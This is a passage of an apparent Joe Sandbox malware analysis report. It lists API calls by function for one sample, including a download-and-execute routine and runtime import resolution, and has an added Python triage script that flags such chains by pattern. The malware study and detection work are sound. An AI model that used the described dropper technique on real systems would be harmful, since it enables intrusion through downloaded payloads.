                                                    • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                    • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$Info
                                                    • String ID:
                                                    • API String ID: 2509303402-0
                                                    • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                    • Instruction ID: ea697259eda2c798d68d53481916d06b4f9b7bf13471f832719d2858ddd7bf87
                                                    • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                    • Instruction Fuzzy Hash: DBB1D07190031AAFEB11DF68C881BEEBBF9BF49304F14446DE895A7281D775A845CF28
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                    • _free.LIBCMT ref: 0043A631
                                                      • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                    • _free.LIBCMT ref: 0043A653
                                                    • _free.LIBCMT ref: 0043A668
                                                    • _free.LIBCMT ref: 0043A673
                                                    • _free.LIBCMT ref: 0043A695
                                                    • _free.LIBCMT ref: 0043A6A8
                                                    • _free.LIBCMT ref: 0043A6B6
                                                    • _free.LIBCMT ref: 0043A6C1
                                                    • _free.LIBCMT ref: 0043A6F9
                                                    • _free.LIBCMT ref: 0043A700
                                                    • _free.LIBCMT ref: 0043A71D
                                                    • _free.LIBCMT ref: 0043A735
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                    • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                    • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 0252A8A3
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C0F
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C21
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C33
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C45
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C57
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C69
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C7B
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C8D
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529C9F
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529CB1
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529CC3
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529CD5
                                                      • Part of subcall function 02529BF2: _free.LIBCMT ref: 02529CE7
                                                    • _free.LIBCMT ref: 0252A898
                                                      • Part of subcall function 025236D1: HeapFree.KERNEL32(00000000,00000000,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?), ref: 025236E7
                                                      • Part of subcall function 025236D1: GetLastError.KERNEL32(?,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?,?), ref: 025236F9
                                                    • _free.LIBCMT ref: 0252A8BA
                                                    • _free.LIBCMT ref: 0252A8CF
                                                    • _free.LIBCMT ref: 0252A8DA
                                                    • _free.LIBCMT ref: 0252A8FC
                                                    • _free.LIBCMT ref: 0252A90F
                                                    • _free.LIBCMT ref: 0252A91D
                                                    • _free.LIBCMT ref: 0252A928
                                                    • _free.LIBCMT ref: 0252A960
                                                    • _free.LIBCMT ref: 0252A967
                                                    • _free.LIBCMT ref: 0252A984
                                                    • _free.LIBCMT ref: 0252A99C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                    • Instruction ID: 4b81f423d76342341a378a0188d79d4e1e0ef95540ea8364cef7032030e994fd
                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                    • Instruction Fuzzy Hash: DA31A031600326AFEB20AB39D840B56BBEABF46360F114459E449D76D0DF74F859CB5C
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                    • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                    • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                    • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                    APIs
                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024F2C7E
                                                    • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 024F2C94
                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 024F2CB0
                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 024F2CC6
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 024F2CFF
                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 024F2D3B
                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 024F2D58
                                                    • ShellExecuteExW.SHELL32(?), ref: 024F2DCF
                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 024F2DE4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                    • String ID: <
                                                    • API String ID: 838076374-4251816714
                                                    • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                    • Instruction ID: 942126ea1584620f2a01b58bf5110de12b74cb24d6b70bebb39755c15274f0d5
                                                    • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                    • Instruction Fuzzy Hash: 89414E7190021DAEEB60DF649C85FEAB7BCFB45745F0080E6A649A2150DFB09E858FA4
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0250F228,00000004,02507D87,00000004,02508069), ref: 0250EEF9
                                                    • GetLastError.KERNEL32(?,0250F228,00000004,02507D87,00000004,02508069,?,02508799,?,00000008,0250800D,00000000,?,?,00000000,?), ref: 0250EF05
                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,0250F228,00000004,02507D87,00000004,02508069,?,02508799,?,00000008,0250800D,00000000,?,?,00000000), ref: 0250EF15
                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 0250EF2B
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF41
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF58
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF6F
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF86
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF9D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                    • String ID: advapi32.dll
                                                    • API String ID: 2340687224-4050573280
                                                    • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                    • Instruction ID: e464381b8cf5a5ff9ab08dba5fff0d230a9b0c3b51c673e29735a0a56c4ead43
                                                    • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                    • Instruction Fuzzy Hash: 25217CB1904611BFE7106FB4DC4DA5ABFA8FF05B16F104A2AF555E3640CBBC94418FA8
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0250F228,00000004,02507D87,00000004,02508069), ref: 0250EEF9
                                                    • GetLastError.KERNEL32(?,0250F228,00000004,02507D87,00000004,02508069,?,02508799,?,00000008,0250800D,00000000,?,?,00000000,?), ref: 0250EF05
                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,0250F228,00000004,02507D87,00000004,02508069,?,02508799,?,00000008,0250800D,00000000,?,?,00000000), ref: 0250EF15
                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 0250EF2B
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF41
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF58
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF6F
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF86
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF9D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                    • String ID: advapi32.dll
                                                    • API String ID: 2340687224-4050573280
                                                    • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                    • Instruction ID: 0ffe6509c9d5117e3f1dd053f7e29e636573a801dd3499810abeae8b8d8532c5
                                                    • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                    • Instruction Fuzzy Hash: A4217CB1904711BBE7106FA4DC4DA5ABFACFB05B16F104A2AF555E3640CBBC94418BA8
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0250670B), ref: 025024B6
                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 025024C4
                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 025024D2
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0250670B), ref: 02502500
                                                    • GetProcAddress.KERNEL32(00000000), ref: 02502507
                                                    • GetLastError.KERNEL32(?,?,?,0250670B), ref: 02502522
                                                    • GetLastError.KERNEL32(?,?,?,0250670B), ref: 0250252E
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02502544
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02502552
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                    • String ID: kernel32.dll
                                                    • API String ID: 4179531150-1793498882
                                                    • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                    • Instruction ID: 92ce81104e941873d05103bcd5e084f329e3fcaabc1241d11b32117295666725
                                                    • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                    • Instruction Fuzzy Hash: EA1182759003117FE7117B75ACDDA6B7BACBF46B12B20052ABC01E61D1EF78D9008A6D
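The three listings above are the ones worth an analyst's time in this block. The WININET/SHELL32 function is a complete download-and-execute chain: InternetOpenUrlW fetches a URL, GetTempPathW/GetTempFileNameW pick a drop path, CreateFileW opens it with 0x40000000 (GENERIC_WRITE) and disposition 2 (CREATE_ALWAYS), InternetReadFile pulls 0x400-byte chunks that WriteFile appends, ShellExecuteExW launches the result and WaitForSingleObject waits up to 0x8000 (32768) ms for it. The two advapi32.dll functions resolve imports at runtime: LoadLibraryExW with flag 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32), a GetLastError check, a LoadLibraryW fallback and six GetProcAddress lookups whose name arguments are not visible statically. The kernel32.dll GetModuleHandleW/GetProcAddress function looks similar but sits beside Concurrency::scheduler_resource_allocation_error and __CxxThrowException@8 (LIBCONCRT/LIBVCRUNTIME), so it is best read as statically linked Concurrency Runtime code rather than sample-specific logic. The following script, an added example that is not part of the Joe Sandbox report, parses listings in exactly this format and applies those three checks; its stage patterns, constant tables and runtime-library heuristic are its own assumptions, and the embedded listings are copied from the entries above (the advapi32 one shortened to three of its six GetProcAddress lines).

```python
"""Triage helper for the per-function "APIs" listings in this report (added example, not Joe Sandbox code).
Parses "• Name.MODULE(args), ref: ADDR" lines, flags a download-and-execute chain and GetProcAddress-based
API resolution, decodes a few flag arguments, and marks functions that also reference statically linked
runtime code (LIBCMT/LIBCONCRT/LIBVCRUNTIME/LIBCPMT). Stage patterns and constant tables are this example's own."""
import re
from collections import namedtuple

CALL_RE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
                     r"(?P<name>[\w@:]+)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
Call = namedtuple("Call", "name module args ref subcall")
RUNTIME_MODULES = {"LIBCMT", "LIBCONCRT", "LIBVCRUNTIME", "LIBCPMT"}
# Each stage is a regex over the API name; the stages must occur in call order.
DOWNLOAD_EXECUTE = (r"^(InternetOpenUrl|InternetReadFile|URLDownloadToFile|WinHttpReadData)",
                    r"^WriteFile", r"^(ShellExecute|CreateProcess|WinExec)")
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x20000000: "GENERIC_EXECUTE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
LOAD_FLAGS = {0x2: "LOAD_LIBRARY_AS_DATAFILE", 0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
              0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS"}


def parse_calls(listing):
    """Parse every call line; lines attributed to a subcall are kept but flagged."""
    calls = []
    for line in listing.splitlines():
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["name"], m["module"], args, int(m["ref"], 16), m["parent"] is not None))
    return calls


def match_stages(calls, stages):
    """Ordered-subsequence match; returns the matching call names or None."""
    hits = []
    for c in calls:
        if len(hits) < len(stages) and re.match(stages[len(hits)], c.name):
            hits.append(c.name)
    return hits if len(hits) == len(stages) else None


def dynamic_resolution(calls):
    """Modules loaded by name, and how many GetProcAddress calls follow a load."""
    loaded, resolved = set(), 0
    for c in calls:
        if re.match(r"^(LoadLibrary|GetModuleHandle)", c.name):
            if c.args and c.args[0].lower().endswith(".dll"):
                loaded.add(c.args[0].lower())
        elif c.name == "GetProcAddress" and loaded:
            resolved += 1
    return sorted(loaded), resolved


def _flags(value, table):
    return "|".join(n for bit, n in table.items() if value & bit) or hex(value)


def decode(call):
    """Decode flag arguments by documented Win32 parameter position; None if not covered."""
    a = [int(x, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", x) else None for x in call.args]
    if call.name.startswith("CreateFile") and len(a) >= 5 and None not in (a[1], a[4]):
        return f"{_flags(a[1], ACCESS)}, {DISPOSITION.get(a[4], hex(a[4]))}"
    if call.name.startswith("LoadLibraryEx") and len(a) >= 3 and a[2] is not None:
        return _flags(a[2], LOAD_FLAGS)
    if call.name == "WaitForSingleObject" and len(a) >= 2 and a[1] is not None:
        return "INFINITE" if a[1] == 0xFFFFFFFF else f"{a[1]} ms"
    return None


def triage(listing):
    """Summarise one function's API listing for an analyst."""
    calls = [c for c in parse_calls(listing) if not c.subcall]
    loaded, resolved = dynamic_resolution(calls)
    return {
        "download_execute": match_stages(calls, DOWNLOAD_EXECUTE),
        "drops_to_temp": any(c.name.startswith("GetTemp") for c in calls),
        "resolves_from": loaded,
        "getprocaddress_calls": resolved,
        "runtime_library": any(c.module in RUNTIME_MODULES for c in calls),
        "decoded": {f"{c.name}@{c.ref:08X}": d for c in calls if (d := decode(c))},
    }


# Listings copied from this report; RESOLVER keeps three of its six GetProcAddress lines.
DOWNLOADER = """\
• InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024F2C7E
• InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 024F2C94
• GetTempPathW.KERNEL32(00000105,?), ref: 024F2CB0
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 024F2CC6
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 024F2CFF
• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 024F2D3B
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 024F2D58
• ShellExecuteExW.SHELL32(?), ref: 024F2DCF
• WaitForSingleObject.KERNEL32(?,00008000), ref: 024F2DE4
"""
RESOLVER = """\
• LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0250F228,00000004,02507D87,00000004,02508069), ref: 0250EEF9
• GetLastError.KERNEL32(?,0250F228,00000004,02507D87,00000004,02508069,?,02508799,?,00000008,0250800D,00000000,?,?,00000000,?), ref: 0250EF05
• LoadLibraryW.KERNEL32(advapi32.dll,?,0250F228,00000004,02507D87,00000004,02508069,?,02508799,?,00000008,0250800D,00000000,?,?,00000000), ref: 0250EF15
• GetProcAddress.KERNEL32(00000000,00447430), ref: 0250EF2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF41
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0250EF58
"""
CRT_RESOLVER = """\
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0250670B), ref: 025024B6
• GetProcAddress.KERNEL32(00000000,00446CDC), ref: 025024C4
• GetProcAddress.KERNEL32(00000000,00446CF4), ref: 025024D2
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02502544
• __CxxThrowException@8.LIBVCRUNTIME ref: 02502552
"""

if __name__ == "__main__":
    for label, text in (("downloader", DOWNLOADER), ("advapi32", RESOLVER), ("kernel32", CRT_RESOLVER)):
        print(label, triage(text))
```

Run against the three listings, the downloader entry matches every stage of the chain, shows a temp-directory drop and carries no runtime-library references; the advapi32 entry reports no chain but three resolved imports after a LoadLibraryExW decoded as LOAD_LIBRARY_SEARCH_SYSTEM32; the kernel32 entry resolves two imports too, but is marked runtime_library, which is the cue to triage it last. Subcall lines ("Part of subcall function ...") are parsed but excluded from the sequence checks because they belong to a different address range.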
                                                    APIs
                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                      • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                    • String ID: pContext$switchState
                                                    • API String ID: 3151764488-2660820399
                                                    • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                    • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                    • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                    • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                    • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                    • SafeRWList.LIBCONCRT ref: 00419798
                                                      • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                      • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                    • GetLastError.KERNEL32 ref: 004197B9
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                    • String ID: eventObject
                                                    • API String ID: 1999291547-1680012138
                                                    • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                    • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                    • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                    • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 02510C36
                                                    • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02510C9D
                                                    • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02510CBA
                                                    • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02510D20
                                                    • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02510D35
                                                    • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02510D47
                                                    • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02510D75
                                                    • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02510D80
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02510DAC
                                                    • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02510DBC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                    • String ID:
                                                    • API String ID: 3720063390-0
                                                    • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                    • Instruction ID: e8e89560666b177eca3f8910d5d6642cf17a0d781d68145044ade4c5fe9def99
                                                    • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                    • Instruction Fuzzy Hash: 5441D330A042499BEF14FFA4C8947BD7BA2BF81308F1440AAD9055B2C2CF759A45CF6A
                                                    APIs
                                                    • _free.LIBCMT ref: 00431DFA
                                                      • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                    • _free.LIBCMT ref: 00431E06
                                                    • _free.LIBCMT ref: 00431E11
                                                    • _free.LIBCMT ref: 00431E1C
                                                    • _free.LIBCMT ref: 00431E27
                                                    • _free.LIBCMT ref: 00431E32
                                                    • _free.LIBCMT ref: 00431E3D
                                                    • _free.LIBCMT ref: 00431E48
                                                    • _free.LIBCMT ref: 00431E53
                                                    • _free.LIBCMT ref: 00431E61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                    • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
